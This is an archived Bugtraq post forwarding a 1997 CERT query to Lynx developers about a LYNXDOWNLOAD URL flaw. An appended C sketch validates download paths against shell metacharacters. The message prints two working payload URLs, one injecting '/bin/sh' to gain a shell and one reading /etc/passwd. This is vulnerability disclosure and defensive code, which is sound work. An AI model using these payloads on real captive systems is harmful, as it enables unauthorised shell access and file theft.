Bugtraq mailing list archives
msg00234.html
From: brush () SEARCH POL PL (brush () SEARCH POL PL)
Date: Thu, 17 Jul 1997 16:42:22 -0000
LYNX-DEV VU#5135 (Lynx vulnerability?) (fwd)

To: Lynx Development <lynx-dev () sig net>
Subject: LYNX-DEV VU#5135 (Lynx vulnerability?) (fwd)
From: Duncan Hill <dhill () sunbeach net>
Date: Tue, 24 Jun 1997 07:56:04 +0400 (GMT-4)
cc: Roger Hill <rhill () stobyn ml org>
Reply-To: lynx-dev () sig net
Sender: owner-lynx-dev () quartz netop sig net

I'm not sure if the entire list got this. I got it because I'm still subscribed to the raven list :) So, here it is in case nobody's seen it yet.

Duncan Hill

---------- Forwarded message ----------
Date: Mon, 23 Jun 1997 17:52:06 -0400 (EDT)
From: "CERT(sm) Coordination Center" <cert () cert org>
Reply-To: lynx-dev () raven cc ukans edu
To: Lynx Developers <lynx-dev () raven cc ukans edu>
Cc: "CERT(sm) Coordination Center" <cert () cert org>
Subject: VU#5135 (Lynx vulnerability?)

Hello folks,

We have received a report of a potential vulnerability with lynx, which we wanted to check with you on.

When you start up a lynx client session, you can hit "g" (for Goto) and then enter the following URL:

    URL to open: LYNXDOWNLOAD://Method=-1/File=/dev/null;/bin/sh;/SugFile=/dev/null
    Enter a filename: /dev/null
    File exists. Overwrite? (y/n) y

This then gives a shell on the client machine on which the lynx process is executing.

Similarly, you can copy and inspect arbitrary files on the local system thus:

    LYNXDOWNLOAD://Method=-1/File=/etc/passwd/SugFile=/dev/stdout
    Enter a filename: /dev/stdout
    File exists. Overwrite? (y/n) y

This returns a copy of the /etc/password file to the user's browser session.

Normally this may not be a problem if you are executing lynx from your local account on your workstation. However, if you are running lynx as a captive information service (as discussed on the lynx man page), then this means that an attacker can run arbitrary commands and inspect arbitrary files on the victim system without authorization.

We are aware of one site where you can telnet to the system, and without any authentication process, the user is given a lynx browser session. By entering the URL above, an attacker would then be able to obtain an interactive shell on that system without having been authenticated.

We would be interested in knowing whether this is a known problem. The reporter suggested that disabling downloads would be an appropriate workaround. If you are in agreement with this, is this a feature that is enabled by default? (This would require the captive session to be started using the "-restrictions=download" option, wouldn't it?)

If this is a known problem, have you any suggestions as to the solution, or any idea whether patches are (or would be) available to address these problems?

We would appreciate any feedback that you may have on these questions.

Thanks very much for your time.

Regards,
Rob.

Rob McMillan
CERT Coordination Center (*)
Software Engineering Institute
Carnegie Mellon University
Pittsburgh, Pa. 15213-3890

Email: cert () cert org
Phone: +1 (412) 268 7090 (24 x 7)
Fax: +1 (412) 268 6989
Web: http://www.cert.org
Timezone: GMT-5 (EST)

* CERT is registered with the U.S. Patent and Trademark Office. The Software Engineering Institute is sponsored by the U.S. Department of Defense.
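
The C sketch below is an added example, not part of the forwarded message and not Lynx's own code or its eventual fix. It shows one way a browser could vet the File= value of a LYNXDOWNLOAD URL before it reaches any copy or shell step. The TMP_PREFIX directory, the function names and the third sample URL are assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>

/* Assumption: the browser keeps files it fetched itself under this directory. */
#define TMP_PREFIX "/tmp/lynx-dl/"

/* Copy the text between `key` and `end` in url into out.
 * Returns 0 on success, -1 if a marker is missing or the value is too long. */
static int field(const char *url, const char *key, const char *end,
                 char *out, size_t outlen)
{
    const char *s = strstr(url, key);
    if (!s) return -1;
    s += strlen(key);
    const char *e = strstr(s, end);
    if (!e || (size_t)(e - s) >= outlen) return -1;
    memcpy(out, s, (size_t)(e - s));
    out[e - s] = '\0';
    return 0;
}

/* Returns 1 only when File= is a plain path inside TMP_PREFIX, else 0. */
int download_url_is_safe(const char *url)
{
    char file[256];
    if (strncmp(url, "LYNXDOWNLOAD://", 15) != 0) return 0;
    if (field(url, "/File=", "/SugFile=", file, sizeof file) != 0) return 0;
    /* Characters a shell would interpret, including the ';' in the report. */
    if (file[strcspn(file, ";|&`$<>()\\\"' \t\n*?[]{}!~")] != '\0') return 0;
    if (strstr(file, "..")) return 0;              /* no directory traversal */
    if (strncmp(file, TMP_PREFIX, strlen(TMP_PREFIX)) != 0) return 0;
    return 1;
}

int main(void)
{
    const char *samples[] = {
        /* the two URLs quoted in the report */
        "LYNXDOWNLOAD://Method=-1/File=/dev/null;/bin/sh;/SugFile=/dev/null",
        "LYNXDOWNLOAD://Method=-1/File=/etc/passwd/SugFile=/dev/stdout",
        /* constructed: a file the browser itself would have written */
        "LYNXDOWNLOAD://Method=-1/File=/tmp/lynx-dl/L1234.html/SugFile=index.html",
    };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%-6s %s\n", download_url_is_safe(samples[i]) ? "accept" : "reject",
               samples[i]);
    return 0;
}
```

A check like this complements, rather than replaces, starting a captive session with the "-restrictions=download" option mentioned in the message.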